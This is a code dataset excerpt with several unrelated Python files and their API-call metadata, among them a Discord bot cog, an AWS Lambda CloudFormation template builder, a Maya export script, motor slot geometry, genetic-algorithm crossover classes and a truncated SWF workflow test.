import asyncio import discord from discord.ext.commands import Bot from discord.ext import commands from discord import Color, Embed class Test(commands.Cog): def __init__(self, bot): self.bot = bot @commands.command() async def test(self, ctx): guild = ctx.message.guild content = ctx.message.content.split()[1:] word = content[0] print(guild.get_member(int(word[3:-1])).nick) def setup(bot): bot.add_cog(Test(bot))
[ "discord.ext.commands.command" ]
[((221, 239), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (237, 239), False, 'from discord.ext import commands\n')]
from mako.template import Template from mako.runtime import Context try: from StringIO import StringIO except ImportError: from io import StringIO from lambdatool.parts import get_the_api_chunk from lambdatool.cf_import_things import role_parameter_section from lambdatool.cf_import_things import parameter_role_spec from lambdatool.cf_import_things import imported_role_spec from lambdatool.cf_import_things import sg_parameter_section from lambdatool.cf_import_things import sg_parameter_spec from lambdatool.cf_import_things import imported_sg_spec from lambdatool.cf_import_things import subnets_parameter_section from lambdatool.cf_import_things import subnets_parameter_spec from lambdatool.cf_import_things import imported_subnets_spec from lambdatool.cf_import_things import api_output_section from lambdatool.cf_import_things import output_section from lambdatool.cf_import_things import lambda_log_group from lambdatool.cf_import_things import resource_policy_spacer from lambdatool.cf_import_things import resource_policy import traceback import os import sys import logging whitelist = 'whitelist' export_name = 'export_name' snsTopicARN = 'snstopicarn' trustedService = 'trustedservice' trustedAccount = 'trustedaccount' reservedConcurrency = 'reservedconcurrency' schedule = 'scheduleexpression' service = 'service' new_line = '\n' spacer = ' ' sns_topic_arn = """ snsTopicARN: Description: the ARN of the topic to which we are subscribing Type: String""" trusted_service = """ trustedService: Description: service which this lambda trusts Type: String""" trusted_account = """ trustedAccount: Description: account which this lambda trusts Type: String""" reserved_concurrency = """ reservedConcurrency: Description: the maximum number of concurrent invocations Type: String""" schedule_expression = """ scheduleExpression: Description: rate or cron expression for a scheduled lambda Type: String""" sns_subcription_resource = """ TopicSubscription: Type: AWS::SNS::Subscription DependsOn: LambdaFunction Properties: Endpoint: Fn::GetAtt: [LambdaFunction, Arn] Protocol: lambda TopicArn: Ref: snsTopicARN TopicPermission: Type: AWS::Lambda::Permission DependsOn: TopicSubscription Properties: FunctionName: Fn::GetAtt: [LambdaFunction, Arn] Action: lambda:InvokeFunction Principal: sns.amazonaws.com""" WITH_ACCOUNT = 'WITH_ACCOUNT' WITHOUT_ACCOUNT = 'WITHOUT_ACCOUNT' trusted_service_resource = dict() trusted_service_resource[WITHOUT_ACCOUNT] = """ TrustedService: Type: AWS::Lambda::Permission DependsOn: LambdaFunction Properties: FunctionName: Fn::GetAtt: [LambdaFunction, Arn] Action: lambda:InvokeFunction Principal: Ref: trustedService""" trusted_service_resource[WITH_ACCOUNT] = """ TrustedService: Type: AWS::Lambda::Permission DependsOn: LambdaFunction Properties: FunctionName: Fn::GetAtt: [LambdaFunction, Arn] Action: lambda:InvokeFunction Principal: Ref: trustedService SourceAccount: Ref: trustedAccount""" reserved_concurrency_resource = ''' ReservedConcurrentExecutions: Ref: reservedConcurrency''' rule_id = '{}-{}'.format( os.environ.get('LAMBDA_NAME', 'unknown'), os.environ.get('ENVIRONMENT', 'none') ) schedule_resource = """ LambdaSchedule: Type: AWS::Events::Rule DependsOn: LambdaFunction Properties: Description: String ScheduleExpression: Ref: scheduleExpression State: ENABLED Targets: - Arn: Fn::GetAtt: [LambdaFunction, Arn] Id: {} EventPermission: Type: AWS::Lambda::Permission DependsOn: LambdaFunction Properties: FunctionName: Fn::GetAtt: [LambdaFunction, Arn] Action: lambda:InvokeFunction Principal: events.amazonaws.com""".format(rule_id) class TemplateCreator: _stack_properties = None _input_file = None _output_file = None _template_file = None _sns_topic_arn_found = False _trusted_service_found = False _trusted_account_found = False _reserved_concurrency_found = False _create_service = False _schedule_found = False _export_name = None _region = None _stage_name = None _short_name = None _account = None _ssm_client = None _import_role = False _import_subnets = False _import_security_group = False _import_sqs_arn = False _description = None _create_log_group = False SSM = '[ssm:' IMPORT = '[import:' _food = """ Environment: Variables: """ def __init__(self, ssm_client): self._ssm_client = ssm_client def _prop_to_yaml(self, thing): idx = thing.find('=') if idx > -1: key = thing[:idx] val = thing[(idx+1):].strip() val = self._get_ssm_parameter(val) if val: return key, val return None, None def _inject_stuff(self): try: with open(self._input_file, 'r') as infile: for thing in infile: key, val = self._prop_to_yaml(thing.strip()) if key and val: self._food += spacer + key + ': ' + val + '\n' buf = StringIO() t = Template(filename=self._template_file) if self._sns_topic_arn_found: sns_var_bits = sns_topic_arn sns_resource_bits = sns_subcription_resource else: sns_var_bits = '' sns_resource_bits = '' if self._trusted_service_found: if self._trusted_account_found: trusted_service_var_bits = trusted_service + new_line + trusted_account trusted_service_resource_bits = trusted_service_resource[WITH_ACCOUNT] else: trusted_service_var_bits = trusted_service trusted_service_resource_bits = trusted_service_resource[WITHOUT_ACCOUNT] else: trusted_service_var_bits = '' trusted_service_resource_bits = '' if self._reserved_concurrency_found: reserved_concurrency_var_bits = reserved_concurrency reserved_concurrency_resource_bits = reserved_concurrency_resource else: reserved_concurrency_var_bits = '' reserved_concurrency_resource_bits = '' if self._schedule_found: schedule_var_bits = schedule_expression schedule_resource_bits = schedule_resource else: schedule_var_bits = '' schedule_resource_bits = '' if self._create_service: the_api_bits = get_the_api_chunk( region=self._region, stage_name=self._stage_name, short_name=self._short_name, account=self._account, resource_policy=self._resource_policy ) else: the_api_bits = '' if self._import_role: current_role_parameter_section = '' role = self._find_imported_csv( self._stack_properties.get('role', None) ) role_specification = imported_role_spec.format(role) else: current_role_parameter_section = role_parameter_section role_specification = parameter_role_spec subnet_specification = None includeVpcConfig = True if self._stack_properties.get('subnetIds', None) is None: current_subnets_parameter_section = None subnet_specification = None includeVpcConfig = False elif self._import_subnets: current_subnets_parameter_section = '' subnets = self._find_imported_csv( self._stack_properties.get('subnetIds', None) ) for subnet in subnets.split(','): if subnet_specification: subnet_specification = subnet_specification + \ '\n' + spacer + \ imported_subnets_spec.format(subnet) else: subnet_specification = imported_subnets_spec.format(subnet) else: current_subnets_parameter_section = subnets_parameter_section subnet_specification = subnets_parameter_spec sg_specification = None if self._stack_properties.get('securityGroupIds', None) is None: current_sg_parameter_section = None sg_specification = None includeVpcConfig = False elif self._import_security_group: current_sg_parameter_section = '' sg_csv = self._find_imported_csv( self._stack_properties.get('securityGroupIds', None) ) for sg in sg_csv.split(','): if sg_specification: sg_specification = sg_specification + \ '\n' + spacer + \ imported_sg_spec.format(sg) else: sg_specification = imported_sg_spec.format(sg) else: current_sg_parameter_section = sg_parameter_section sg_specification = sg_parameter_spec logging.info('includeVpcConfig: %s', includeVpcConfig) if self._export_name: if self._create_service: output_section_bits = api_output_section.format( self._export_name, self._export_name, self._export_name ) else: output_section_bits = output_section.format(self._export_name, self._export_name) else: output_section_bits = '' if self._create_log_group: lambda_log_group_bits = lambda_log_group else: lambda_log_group_bits = '' ctx = Context( buf, environment_section=self._food, stackDescription=self._description, outputSection=output_section_bits, snsTopicARN=sns_var_bits, snsSubscriptionResource=sns_resource_bits, trustedService=trusted_service_var_bits, trustedServiceResource=trusted_service_resource_bits, reservedConcurrency=reserved_concurrency_var_bits, reservedConcurrencyResource=reserved_concurrency_resource_bits, scheduleExpression=schedule_var_bits, scheduleResource=schedule_resource_bits, theAPI=the_api_bits, roleParameterSection=current_role_parameter_section, roleSpecification=role_specification, subnetsParameterSection=current_subnets_parameter_section, subnetIds=subnet_specification, sgParameterSection=current_sg_parameter_section, lambdaLogGroup=lambda_log_group_bits, securityGroupIds=sg_specification, includeVpcConfig=includeVpcConfig ) t.render_context(ctx) logging.info('writing template {}'.format(self._output_file)) with open(self._output_file, "w") as outfile: outfile.write(buf.getvalue()) except Exception as wtf: logging.error('Exception caught in inject_stuff(): {}'.format(wtf)) traceback.print_exc(file=sys.stdout) sys.exit(1) def _read_stack_properties(self): try: lowered_stack_properties = {} for key in self._stack_properties: lowered_key = key.lower() lowered_stack_properties[lowered_key] = self._stack_properties[key] role = lowered_stack_properties.get('role', None) subnets = lowered_stack_properties.get('subnetids', None) security_group = lowered_stack_properties.get('securitygroupids', None) sqs_arn = lowered_stack_properties.get('sqsarn', None) if role and role.startswith(self.IMPORT): self._import_role = True if subnets and subnets.startswith(self.IMPORT): self._import_subnets = True if security_group and security_group.startswith(self.IMPORT): self._import_security_group = True if sqs_arn and sqs_arn.startswith(self.IMPORT): self._import_sqs_arn = True if snsTopicARN in lowered_stack_properties: self._sns_topic_arn_found = True if trustedService in lowered_stack_properties: self._trusted_service_found = True if trustedAccount in lowered_stack_properties: self._trusted_account_found = True if reservedConcurrency in lowered_stack_properties: self._reserved_concurrency_found = True if schedule in lowered_stack_properties: self._schedule_found = True if export_name in lowered_stack_properties: self._export_name = lowered_stack_properties.get(export_name) if lowered_stack_properties.get('whitelist', None): parts = lowered_stack_properties.get(whitelist).split(',') buf = resource_policy for cidr in parts: buf = buf + '\n' + resource_policy_spacer + cidr self._resource_policy = buf else: self._resource_policy = '' tmp = lowered_stack_properties.get(service, 'false').lower() if tmp == 'true': self._create_service = True except Exception as wtf: logging.error('Exception caught in read_stack_properties(): {}'.format(wtf)) sys.exit(1) return True def create_template(self, **kwargs): try: self._input_file = kwargs['function_properties'] self._stack_properties = kwargs['stack_properties'] self._output_file = kwargs['output_file'] self._template_file = kwargs['template_file'] self._region = kwargs['region'] self._stage_name = kwargs['stage_name'] self._short_name = kwargs['short_name'] self._account = kwargs['account'] self._create_log_group = kwargs['create_log_group'] self._description = kwargs.get('description', 'Fantastic Lambda Function') self._read_stack_properties() self._inject_stuff() return True except Exception as wtf: logging.error(wtf) return False def _get_ssm_parameter(self, p): """ Get parameters from Simple Systems Manager Args: p - a parameter name Returns: a value, decrypted if needed, if successful or None if things go sideways. """ try: if p.startswith(self.SSM) and p.endswith(']'): parts = p.split(':') p = parts[1].replace(']', '') else: return p response = self._ssm_client.get_parameter(Name=p, WithDecryption=True) return response.get('Parameter', {}).get('Value', None) except Exception as ruh_roh: logging.error(ruh_roh, exc_info=False) return None def _find_imported_csv(self, raw_str): answer = None try: wrk = raw_str wrk = wrk.replace('[', '') wrk = wrk.replace(']', '') wrk = wrk.replace(' ', '') parts = wrk.split(':') answer = parts[1] except Exception: answer = None return answer if __name__ == '__main__': templateCreator = TemplateCreator() templateCreator.create_template( function_properties='/tmp/scratch/f315ee80/config/dev/function.properties', stack_properties='/tmp/scratch/f315ee80/stack.properties', output_file='/tmp/template.yaml', template_file='template_template' )
[ "lambdatool.cf_import_things.imported_subnets_spec.format", "mako.template.Template", "os.environ.get", "lambdatool.cf_import_things.api_output_section.format", "lambdatool.cf_import_things.output_section.format", "lambdatool.cf_import_things.imported_role_spec.format", "sys.exit", "lambdatool.parts.get_the_api_chunk", "io.StringIO", "traceback.print_exc", "logging.info", "logging.error", "lambdatool.cf_import_things.imported_sg_spec.format", "mako.runtime.Context" ]
[((3352, 3392), 'os.environ.get', 'os.environ.get', (['"""LAMBDA_NAME"""', '"""unknown"""'], {}), "('LAMBDA_NAME', 'unknown')\n", (3366, 3392), False, 'import os\n'), ((3398, 3435), 'os.environ.get', 'os.environ.get', (['"""ENVIRONMENT"""', '"""none"""'], {}), "('ENVIRONMENT', 'none')\n", (3412, 3435), False, 'import os\n'), ((5446, 5456), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5454, 5456), False, 'from io import StringIO\n'), ((5473, 5511), 'mako.template.Template', 'Template', ([], {'filename': 'self._template_file'}), '(filename=self._template_file)\n', (5481, 5511), False, 'from mako.template import Template\n'), ((9780, 9834), 'logging.info', 'logging.info', (['"""includeVpcConfig: %s"""', 'includeVpcConfig'], {}), "('includeVpcConfig: %s', includeVpcConfig)\n", (9792, 9834), False, 'import logging\n'), ((10490, 11385), 'mako.runtime.Context', 'Context', (['buf'], {'environment_section': 'self._food', 'stackDescription': 'self._description', 'outputSection': 'output_section_bits', 'snsTopicARN': 'sns_var_bits', 'snsSubscriptionResource': 'sns_resource_bits', 'trustedService': 'trusted_service_var_bits', 'trustedServiceResource': 'trusted_service_resource_bits', 'reservedConcurrency': 'reserved_concurrency_var_bits', 'reservedConcurrencyResource': 'reserved_concurrency_resource_bits', 'scheduleExpression': 'schedule_var_bits', 'scheduleResource': 'schedule_resource_bits', 'theAPI': 'the_api_bits', 'roleParameterSection': 'current_role_parameter_section', 'roleSpecification': 'role_specification', 'subnetsParameterSection': 'current_subnets_parameter_section', 'subnetIds': 'subnet_specification', 'sgParameterSection': 'current_sg_parameter_section', 'lambdaLogGroup': 'lambda_log_group_bits', 'securityGroupIds': 'sg_specification', 'includeVpcConfig': 'includeVpcConfig'}), '(buf, environment_section=self._food, stackDescription=self.\n _description, outputSection=output_section_bits, snsTopicARN=\n sns_var_bits, snsSubscriptionResource=sns_resource_bits, trustedService\n =trusted_service_var_bits, trustedServiceResource=\n trusted_service_resource_bits, reservedConcurrency=\n reserved_concurrency_var_bits, reservedConcurrencyResource=\n reserved_concurrency_resource_bits, scheduleExpression=\n schedule_var_bits, scheduleResource=schedule_resource_bits, theAPI=\n the_api_bits, roleParameterSection=current_role_parameter_section,\n roleSpecification=role_specification, subnetsParameterSection=\n current_subnets_parameter_section, subnetIds=subnet_specification,\n sgParameterSection=current_sg_parameter_section, lambdaLogGroup=\n lambda_log_group_bits, securityGroupIds=sg_specification,\n includeVpcConfig=includeVpcConfig)\n', (10497, 11385), False, 'from mako.runtime import Context\n'), ((6972, 7139), 'lambdatool.parts.get_the_api_chunk', 'get_the_api_chunk', ([], {'region': 'self._region', 'stage_name': 'self._stage_name', 'short_name': 'self._short_name', 'account': 'self._account', 'resource_policy': 'self._resource_policy'}), '(region=self._region, stage_name=self._stage_name,\n short_name=self._short_name, account=self._account, resource_policy=\n self._resource_policy)\n', (6989, 7139), False, 'from lambdatool.parts import get_the_api_chunk\n'), ((7552, 7583), 'lambdatool.cf_import_things.imported_role_spec.format', 'imported_role_spec.format', (['role'], {}), '(role)\n', (7577, 7583), False, 'from lambdatool.cf_import_things import imported_role_spec\n'), ((12016, 12052), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', (12035, 12052), False, 'import traceback\n'), ((12065, 12076), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (12073, 12076), False, 'import sys\n'), ((14413, 14424), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (14421, 14424), False, 'import sys\n'), ((15228, 15246), 'logging.error', 'logging.error', (['wtf'], {}), '(wtf)\n', (15241, 15246), False, 'import logging\n'), ((15949, 15987), 'logging.error', 'logging.error', (['ruh_roh'], {'exc_info': '(False)'}), '(ruh_roh, exc_info=False)\n', (15962, 15987), False, 'import logging\n'), ((9953, 10040), 'lambdatool.cf_import_things.api_output_section.format', 'api_output_section.format', (['self._export_name', 'self._export_name', 'self._export_name'], {}), '(self._export_name, self._export_name, self.\n _export_name)\n', (9978, 10040), False, 'from lambdatool.cf_import_things import api_output_section\n'), ((10194, 10253), 'lambdatool.cf_import_things.output_section.format', 'output_section.format', (['self._export_name', 'self._export_name'], {}), '(self._export_name, self._export_name)\n', (10215, 10253), False, 'from lambdatool.cf_import_things import output_section\n'), ((8600, 8636), 'lambdatool.cf_import_things.imported_subnets_spec.format', 'imported_subnets_spec.format', (['subnet'], {}), '(subnet)\n', (8628, 8636), False, 'from lambdatool.cf_import_things import imported_subnets_spec\n'), ((9600, 9627), 'lambdatool.cf_import_things.imported_sg_spec.format', 'imported_sg_spec.format', (['sg'], {}), '(sg)\n', (9623, 9627), False, 'from lambdatool.cf_import_things import imported_sg_spec\n'), ((8490, 8526), 'lambdatool.cf_import_things.imported_subnets_spec.format', 'imported_subnets_spec.format', (['subnet'], {}), '(subnet)\n', (8518, 8526), False, 'from lambdatool.cf_import_things import imported_subnets_spec\n'), ((9503, 9530), 'lambdatool.cf_import_things.imported_sg_spec.format', 'imported_sg_spec.format', (['sg'], {}), '(sg)\n', (9526, 9530), False, 'from lambdatool.cf_import_things import imported_sg_spec\n')]
# coding: utf-8 # Author: <NAME> # Contact: <EMAIL> # Python modules import os import logging import json logger = logging.getLogger(__name__) # Wizard modules from maya_wizard import wizard_plugin from maya_wizard.export import modeling from maya_wizard.export import rigging from maya_wizard.export import custom from maya_wizard.export import camrig from maya_wizard.export import layout from maya_wizard.export import animation from maya_wizard.export import camera # read_settings if 'wizard_json_settings'.upper() in os.environ.keys(): settings_dic = json.loads(os.environ['wizard_json_settings']) frange = settings_dic['frange'] refresh_assets = settings_dic['refresh_assets'] nspace_list = settings_dic['nspace_list'] stage_name = settings_dic['stage_to_export'] if refresh_assets: wizard_plugin.update_all() if stage_name == 'modeling': modeling.main() elif stage_name == 'rigging': rigging.main() elif stage_name == 'custom': custom.main() elif stage_name == 'camrig': camrig.main() elif stage_name == 'layout': layout.main() elif stage_name == 'animation': animation.main(nspace_list=nspace_list, frange=frange) elif stage_name == 'camera': camera.main(nspace_list=nspace_list, frange=frange) else: logger.warning("Unplugged stage : {}".format(stage_name)) else: logger.error("Batch settings not found")
[ "logging.getLogger", "os.environ.keys", "json.loads", "maya_wizard.export.custom.main", "maya_wizard.wizard_plugin.update_all", "maya_wizard.export.modeling.main", "maya_wizard.export.rigging.main", "maya_wizard.export.camrig.main", "maya_wizard.export.camera.main", "maya_wizard.export.layout.main", "maya_wizard.export.animation.main" ]
[((117, 144), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (134, 144), False, 'import logging\n'), ((527, 544), 'os.environ.keys', 'os.environ.keys', ([], {}), '()\n', (542, 544), False, 'import os\n'), ((565, 611), 'json.loads', 'json.loads', (["os.environ['wizard_json_settings']"], {}), "(os.environ['wizard_json_settings'])\n", (575, 611), False, 'import json\n'), ((827, 853), 'maya_wizard.wizard_plugin.update_all', 'wizard_plugin.update_all', ([], {}), '()\n', (851, 853), False, 'from maya_wizard import wizard_plugin\n'), ((896, 911), 'maya_wizard.export.modeling.main', 'modeling.main', ([], {}), '()\n', (909, 911), False, 'from maya_wizard.export import modeling\n'), ((954, 968), 'maya_wizard.export.rigging.main', 'rigging.main', ([], {}), '()\n', (966, 968), False, 'from maya_wizard.export import rigging\n'), ((1010, 1023), 'maya_wizard.export.custom.main', 'custom.main', ([], {}), '()\n', (1021, 1023), False, 'from maya_wizard.export import custom\n'), ((1065, 1078), 'maya_wizard.export.camrig.main', 'camrig.main', ([], {}), '()\n', (1076, 1078), False, 'from maya_wizard.export import camrig\n'), ((1120, 1133), 'maya_wizard.export.layout.main', 'layout.main', ([], {}), '()\n', (1131, 1133), False, 'from maya_wizard.export import layout\n'), ((1178, 1232), 'maya_wizard.export.animation.main', 'animation.main', ([], {'nspace_list': 'nspace_list', 'frange': 'frange'}), '(nspace_list=nspace_list, frange=frange)\n', (1192, 1232), False, 'from maya_wizard.export import animation\n'), ((1302, 1353), 'maya_wizard.export.camera.main', 'camera.main', ([], {'nspace_list': 'nspace_list', 'frange': 'frange'}), '(nspace_list=nspace_list, frange=frange)\n', (1313, 1353), False, 'from maya_wizard.export import camera\n')]
from numpy import arcsin, arctan, cos, exp, array, angle, pi from numpy import imag as np_imag from scipy.optimize import fsolve def _comp_point_coordinate(self): """Compute the point coordinates needed to plot the Slot. Parameters ---------- self : HoleM50 A HoleM50 object Returns ------- point_dict: dict A dict of the slot coordinates """ Rext = self.get_Rext() # magnet pole pitch angle, must be <2*pi/2*p alpham = 2 * arcsin(self.W0 / (2 * (Rext - self.H1))) # angle (Z9,0,Z9') Harc = (Rext - self.H1) * (1 - cos(alpham / 2)) # alpha on schematics gammam = arctan((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0)) # betam = pi/2-alpham/2-gammam;#40.5 hssp = pi / self.Zh x78 = (self.H3 - self.H2) / cos(gammam) # distance from 7 to 8 Z9 = Rext - Harc - self.H1 - 1j * self.W0 / 2 Z8 = Rext - self.H0 - 1j * self.W1 / 2 Z7 = Rext - self.H0 - x78 - 1j * self.W1 / 2 Z1 = (Rext - self.H1) * exp(1j * (-hssp + arcsin(self.W3 / (2 * (Rext - self.H1))))) Z11 = (Z1 * exp(1j * hssp) + self.H4) * exp(-1j * hssp) Z10 = (Z9 * exp(1j * hssp) + self.H4) * exp(-1j * hssp) # Magnet coordinate with Z8 as center and x as the top edge of the magnet Z8a = -1j * (self.H3 - self.H2) Z8b = self.W2 Z8c = Z8b + self.W4 Z5 = Z8b - 1j * self.H3 Z4 = Z8c - 1j * self.H3 Z6 = Z5 + 1j * self.H2 Z3 = Z4 + 1j * self.H2 Zmag = array([Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c]) Zmag = Zmag * exp(1j * angle(Z9 - Z8)) Zmag = Zmag + Z8 # final complex numbers Zmag=[Z8b Z6 Z5 Z4 Z3 Z8c] (Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c) = Zmag # Rotation so [Z1,Z2] is parallel to the x axis Z3r, Z1r, Z6r = Z3 * exp(1j * hssp), Z1 * exp(1j * hssp), Z6 * exp(1j * hssp) # numerical resolution to find the last point Z2 x = fsolve(lambda x: np_imag((Z3r - (Z1r - x)) / (Z6r - Z3r)), self.H3 - self.H2) Z2 = (Z1r - x[0]) * exp(-1j * hssp) point_dict = dict() point_dict["Z1"] = Z1 point_dict["Z2"] = Z2 point_dict["Z3"] = Z3 point_dict["Z4"] = Z4 point_dict["Z5"] = Z5 point_dict["Z6"] = Z6 point_dict["Z7"] = Z7 point_dict["Z8"] = Z8 point_dict["Z9"] = Z9 point_dict["Z10"] = Z10 point_dict["Z11"] = Z11 point_dict["Z8a"] = Z8a point_dict["Z8b"] = Z8b point_dict["Z8c"] = Z8c # Symmetry point_dict["Z1s"] = Z1.conjugate() point_dict["Z2s"] = Z2.conjugate() point_dict["Z3s"] = Z3.conjugate() point_dict["Z4s"] = Z4.conjugate() point_dict["Z5s"] = Z5.conjugate() point_dict["Z6s"] = Z6.conjugate() point_dict["Z7s"] = Z7.conjugate() point_dict["Z8s"] = Z8.conjugate() point_dict["Z9s"] = Z9.conjugate() point_dict["Z10s"] = Z10.conjugate() point_dict["Z11s"] = Z11.conjugate() point_dict["Z8as"] = Z8a.conjugate() point_dict["Z8bs"] = Z8b.conjugate() point_dict["Z8cs"] = Z8c.conjugate() return point_dict
[ "numpy.arcsin", "numpy.angle", "numpy.exp", "numpy.array", "numpy.cos", "numpy.imag", "numpy.arctan" ]
[((643, 711), 'numpy.arctan', 'arctan', (['((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0))'], {}), '((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0))\n', (649, 711), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1477, 1515), 'numpy.array', 'array', (['[Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c]'], {}), '([Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c])\n', (1482, 1515), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((490, 530), 'numpy.arcsin', 'arcsin', (['(self.W0 / (2 * (Rext - self.H1)))'], {}), '(self.W0 / (2 * (Rext - self.H1)))\n', (496, 530), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((811, 822), 'numpy.cos', 'cos', (['gammam'], {}), '(gammam)\n', (814, 822), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1122, 1139), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1125, 1139), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1182, 1199), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1185, 1199), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1977, 1994), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1980, 1994), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((587, 602), 'numpy.cos', 'cos', (['(alpham / 2)'], {}), '(alpham / 2)\n', (590, 602), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1757, 1773), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1760, 1773), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1778, 1794), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1781, 1794), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1799, 1815), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1802, 1815), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1892, 1932), 'numpy.imag', 'np_imag', (['((Z3r - (Z1r - x)) / (Z6r - Z3r))'], {}), '((Z3r - (Z1r - x)) / (Z6r - Z3r))\n', (1899, 1932), True, 'from numpy import imag as np_imag\n'), ((1094, 1110), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1097, 1110), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1154, 1170), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1157, 1170), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1543, 1557), 'numpy.angle', 'angle', (['(Z9 - Z8)'], {}), '(Z9 - Z8)\n', (1548, 1557), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1035, 1075), 'numpy.arcsin', 'arcsin', (['(self.W3 / (2 * (Rext - self.H1)))'], {}), '(self.W3 / (2 * (Rext - self.H1)))\n', (1041, 1075), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n')]
import numpy as np from abc import ABC, abstractmethod class _CrossOverBase(ABC): def __init__(self, opt_prob): self._opt_prob = opt_prob self._length = opt_prob.length @abstractmethod def mate(self, p1, p2): pass class UniformCrossOver(_CrossOverBase): def __init__(self, opt_prob): super().__init__(opt_prob) def mate(self, p1, p2): bs = np.random.choice(a=[False, True], size=self._length) child = np.array([0] * self._length) for i in range(len(bs)): child[i] = p1[i] if bs[i] else p2[i] return child class OnePointCrossOver(_CrossOverBase): def __init__(self, opt_prob): super().__init__(opt_prob) def mate(self, p1, p2): bs = np.random.randint(self._length) child = np.array([0] * self._length) for i in range(self._length): child[i] = p1[i] if (i<=bs) else p2[i] return child class TSPCrossOver(_CrossOverBase): def __init__(self, opt_prob): super().__init__(opt_prob) def mate(self, p1, p2): if self._length > 1: _n = np.random.randint(self._length - 1) child = np.array([0] * self._length) child[0:_n + 1] = p1[0:_n + 1] unvisited = [node for node in p2 if node not in p1[0:_n + 1]] child[_n + 1:] = unvisited elif np.random.randint(2) == 0: child = np.copy(p1) else: child = np.copy(p2) return child
[ "numpy.random.choice", "numpy.array", "numpy.random.randint", "numpy.copy" ]
[((406, 458), 'numpy.random.choice', 'np.random.choice', ([], {'a': '[False, True]', 'size': 'self._length'}), '(a=[False, True], size=self._length)\n', (422, 458), True, 'import numpy as np\n'), ((475, 503), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (483, 503), True, 'import numpy as np\n'), ((761, 792), 'numpy.random.randint', 'np.random.randint', (['self._length'], {}), '(self._length)\n', (778, 792), True, 'import numpy as np\n'), ((809, 837), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (817, 837), True, 'import numpy as np\n'), ((1131, 1166), 'numpy.random.randint', 'np.random.randint', (['(self._length - 1)'], {}), '(self._length - 1)\n', (1148, 1166), True, 'import numpy as np\n'), ((1187, 1215), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (1195, 1215), True, 'import numpy as np\n'), ((1386, 1406), 'numpy.random.randint', 'np.random.randint', (['(2)'], {}), '(2)\n', (1403, 1406), True, 'import numpy as np\n'), ((1433, 1444), 'numpy.copy', 'np.copy', (['p1'], {}), '(p1)\n', (1440, 1444), True, 'import numpy as np\n'), ((1479, 1490), 'numpy.copy', 'np.copy', (['p2'], {}), '(p2)\n', (1486, 1490), True, 'import numpy as np\n')]
import logging import attr import boto3 import botocore.stub import pytest import decision_tasks import pyflow from pyflow import workflow_state as ws @pytest.fixture def initialize_logging(): logging.basicConfig() pyflow.logger.setLevel(logging.INFO) pytestmark = pytest.mark.usefixtures('initialize_logging') class StringTransformer(pyflow.Workflow): NAME = 'StringTransformer' VERSION = '1.0' string_upcase = pyflow.LambdaDescriptor('string_upcase') string_reverse = pyflow.LambdaDescriptor('string_reverse') subscribe_topic = pyflow.ActivityDescriptor('subscribe_topic_activity', 'v1', task_list='subscription-activities') string_concat = pyflow.ChildWorkflowDescriptor('StringConcatter', '1.0', lambda_role='arn:aws:iam::528461152743:role/swf-lambda') def run(self, workflow_input): # for loops work. In this case upcased will contain a list of futures upcased = [] for s in workflow_input: upcased.append(self.string_upcase(s)) # demonstrate error handling try: # pass a number where a string is expected self.string_upcase(42).result() assert False, "Shouldn't get to here" except pyflow.InvocationFailedException: pass # list comprehensions as well reversed_strs = [self.string_reverse(s.result()) for s in upcased] # Sleep for 5 seconds self.swf.sleep(5) # Wait for all futures to finish before proceeding. This normally isn't necessary since just calling result() # on each future would accomplish the same thing. self.swf.wait_for_all(reversed_strs) # Try invoking an activity subscription = self.subscribe_topic({'email': '<EMAIL>'}) concatted = self.string_concat([s.result() for s in reversed_strs]).result() subscription.result() return concatted class StringConcatter(pyflow.Workflow): NAME = 'StringConcatter' VERSION = '1.0' OPTIONS = {'lambdaRole': 'arn:aws:iam::528461152743:role/swf-lambda'} def run(self, workflow_input): return self.swf.invoke_lambda('string_concat', workflow_input).result() @pytest.fixture def 